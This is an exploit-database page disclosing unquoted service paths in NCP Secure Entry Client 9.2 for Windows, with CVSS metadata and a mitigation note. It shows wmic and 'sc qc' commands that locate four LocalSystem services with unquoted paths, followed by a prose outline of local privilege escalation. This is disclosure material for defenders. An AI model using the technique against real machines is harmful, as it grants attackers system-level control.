header-logo
Suggest Exploit
vendor:
NCP Secure Entry Client
by:
Akif Mohamed Ik
6.8
CVSS
MEDIUM
Unquoted Service Paths
428
CWE
Product Name: NCP Secure Entry Client
Affected Version From: 9.2x
Affected Version To: 9.2x
Patch Exists: NO
Related CWE:
CPE: a:ncp:secure_entry_client:9.2
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 SP1
2019

NCP_Secure_Entry_Client 9.2 – Unquoted Service Paths

The NCP_Secure_Entry_Client version 9.2 for Windows has unquoted service paths, which could allow an attacker to escalate privileges and execute arbitrary code.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, users should manually update the service paths to include quotes around the executable path.
Source

Exploit-DB raw data:

# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths
# Date: 2019-11-17
# Exploit Author: Akif Mohamed Ik
# Vendor Homepage: http://software.ncp-e.com/
# Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/
# Version: 9.2x
# Tested on: Windows 7 SP1
# CVE : NA
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

ncprwsnt                                                        ncprwsnt
                C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
                           Auto
rwsrsu                                                          rwsrsu
                C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
                           Auto
ncpclcfg                                                        ncpclcfg
                C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
                           Auto
NcpSec                                                          NcpSec
                C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
                           Auto
						   
C:\Users\ADMIN>sc qc ncprwsnt					   
[SC] QueryServiceConfig SUCCESS	
		SERVICE_NAME: ncprwsnt
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ncprwsnt
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\ADMIN>sc qc rwsrsu
[SC] QueryServiceConfig SUCCESS

        SERVICE_NAME       : rwsrsu
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : rwsrsu
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
		
C:\Users\ADMIN>sc qc ncpclcfg
[SC] QueryServiceConfig SUCCESS

        SERVICE_NAME       : ncpclcfg
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ncpclcfg
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem		
		
C:\Users\ADMIN>sc qc NcpSec
[SC] QueryServiceConfig SUCCESS

        SERVICE_NAME       : NcpSec
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : NcpSec
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
		
#Exploit:

A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during
application startup or reboot. If successful, the local user's code
would execute with the elevated privileges of the application.

Navigation

Suggest Exploit

Services By CQR